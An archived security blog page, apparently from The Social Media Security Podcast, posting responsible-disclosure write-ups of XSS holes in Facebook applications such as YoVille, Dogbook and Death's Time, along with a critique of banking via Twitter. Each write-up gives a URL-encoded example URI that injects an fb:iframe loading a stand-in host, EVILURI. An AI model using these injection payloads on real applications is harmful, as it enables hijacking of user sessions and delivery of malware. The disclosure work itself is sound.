FAXX Hack: YoVille

Posted under Contributors, Facebook on September 30th, 2009 by

We’ve come to the end in the Month of Facebook Bugs – today’s post marks the last published FAXX Hack for September. The series began with a vulnerability in the no. 1 Facebook application, FarmVille from Zynga. Today we end with a very similar hole in another major Zynga application, discovered about two weeks ago.

I have much to cover in recapping this month, and it will likely take a few days to put everything together. I plan on posting a full report that includes statistics and more detailed explanations on how some of these hacks work. Also, as promised, I intend to post demonstration code showing how these holes can be exploited to access user information and spread virally, in addition to standard XSS issues, such as delivering malware.

Thanks for your interest in the Month of Facebook Bugs, and please stay tuned for the upcoming final report.

Facebook Verified Application

Current Monthly Active Users: 17,944,265

Current Rank on Application Leaderboard: 9

Application Developer: Zynga

Responsiveness: Zynga has been one of the most responsive developers I contacted. They replied back quickly and patched the hole soon after.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/yoville/index.php?type=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Hug Me

Posted under Contributors, Facebook on September 29th, 2009 by

Current Monthly Active Users: 3,157,995

Current Rank on Application Leaderboard: 55

Application Developer: RockYou

Responsiveness: I notified RockYou and Facebook of this hole on Sep. 14th, and have reminded Facebook a few times since that it remains unpatched. I’ve received no communication from RockYou. Update: Facebook contacted me again this evening and said RockYou had deployed a patch, which I have confirmed.

Vulnerability Status: Unpatched Patched Sep. 30

Example URI: http://apps.facebook.com/doittome/refreshAd.php?guid=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

Should you use Twitter for Online Banking?

Posted under Privacy, Social Networking, Twitter on September 28th, 2009 by

Today, a credit union in St. Louis, MO called Vantage Credit Union announced that they are offering a service through Twitter called tweetMyMoney to conduct online banking.  Banking credentials, PINs and account information are not passed through tweets made via direct message to the @myvcu Twitter account (from the FAQ listed on the bank’s website), only commands to get account balance, recent transactions, etc.

However, there are a few potential security issues/concerns with this type of service.  While it seems that VCU has made this system with good intentions, most of these concerns center around the fact that you are putting in requests for account information and even transferring money to other accounts through Twitter which is a third-party service not owned or managed by the bank.

  • Plain and simple, Twitter is a third-party service.  When you send a direct message (DM) to another Twitter user this message is stored on Twitter’s servers.  Not the banks.  The bank is simply retrieving these messages.  You should never have any expectation of privacy from DMs *at all*.  Sure, they are “private” to you and the user you are sending it to but think about who on Twitter’s end might be able to view these DMs.  Remember, security at Twitter is not very important currently as we have seen several times in very recent history.
  • What about the scenario of a local “man-in-the-middle” attack where someone could be sniffing your network traffic to modify your banking requests?  A simple attack like this could easily compromise the users Twitter account.  Guess what, people like to reuse user id’s and passwords…we all know where that could lead to.  I am not sure if they are using any form of two-factor authentication for their online banking application so you may only need a login id and password to access a compromised online banking account.  Again, not sure this is the case with VCU but yes, some banks are still using single factor authentication!
  • How about the security of the @myvcu Twitter account you send your direct messages to?  Attackers *will* target this account, it’s only a matter of time.  You are trusting that the folks at VCU are properly securing this account and there are no vulnerabilities or exploits on the Twitter site to compromise the account as well.  It also looks like this account is used for communicating with customers…it could be possible that these credentials could be phished and/or compromised through multiple avenues of attack.
  • I question the correspondence authentication codes that they have put in place.  Relying on the user to change these multiple codes is an interesting choice.  I could see this being spoofed quite easily.
  • Lastly, the users of this system could also be targeted if say a user accidentally tweeted something like “#l5d 7” to their followers instead of by DM (known as #dmfail)?  Attackers can easily script a bot to look for these patterns and target these users.

I don’t want to knock the folks at VCU as it seems that they are a very “progressive” bank and it looks like they want to push the envelope of new technology.  My opinion is that it just seems that there are too many points of security “fail” in this system.  Potential failures in the Twitter service, @myvcu account and Twitter users of the VCU system in addition to the third-party privacy concerns all make for something that you shouldn’t be trusting your online banking to.  Social networks are not for online banking in any form…srsly.

Thanks to @rogueclown and @nickhacks for the tweets and comments about this new service.

FAXX Hack: Dogbook

Posted under Contributors, Facebook on September 28th, 2009 by

Current Monthly Active Users: 711,503

Current Rank on Application Leaderboard: 159

Application Developer: Poolhouse

Responsiveness: I received no communication from the developers, but Facebook did. The hole was patched about a week after notification.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/dogbook/search/?name=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: myFarm

Posted under Contributors, Facebook on September 28th, 2009 by

(This counts as Sunday’s FAXX Hack.)

Current Monthly Active Users: 945,452

Current Rank on Application Leaderboard: 121

Application Developer: playSocial & take(5)social

Responsiveness: I received no communication from the developers, but Facebook did. The hole was patched about a week after notification.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/farmgame/post.pS?id=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: People I Love!

Posted under Contributors, Facebook on September 26th, 2009 by

Current Monthly Active Users: 986,796

Current Rank on Application Leaderboard: 119

Application Developer: Chad Morovitz

Responsiveness: I received no communication from the developers, but Facebook did. The hole was patched about a week after notification.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/dd832a5e70919175222a209559b89f4b/browse.php?m=n%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E&p=1&process=1

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Photos I Love!

Posted under Contributors, Facebook on September 25th, 2009 by

Current Monthly Active Users: 1,100,267

Current Rank on Application Leaderboard: 113

Application Developer: PhotosILove

Responsiveness: About a week after notification the hole remained live, but I checked back with Facebook and things got patched up.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/photosilove/browse.php?m=u&user=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Death’s Time

Posted under Contributors, Facebook on September 24th, 2009 by

Current Monthly Active Users: 11,802,383

Current Rank on Application Leaderboard: 16

Application Developer: 3happybytes

Responsiveness: I received no communication at first from the developers, but Facebook did. The hole was patched about a week after notification. After patching, the developer get in touch to confirm the fix.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/death-time/result.php?dia=1&anio=1991&mes=1%22%2F%3E%3C%2Fa%3E%3C%2Fp%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

1 9 10 11 12 13 25
Copyright © The Social Media Security Podcast
"Keepwriting" WordPress Theme by Blog Oh! Blog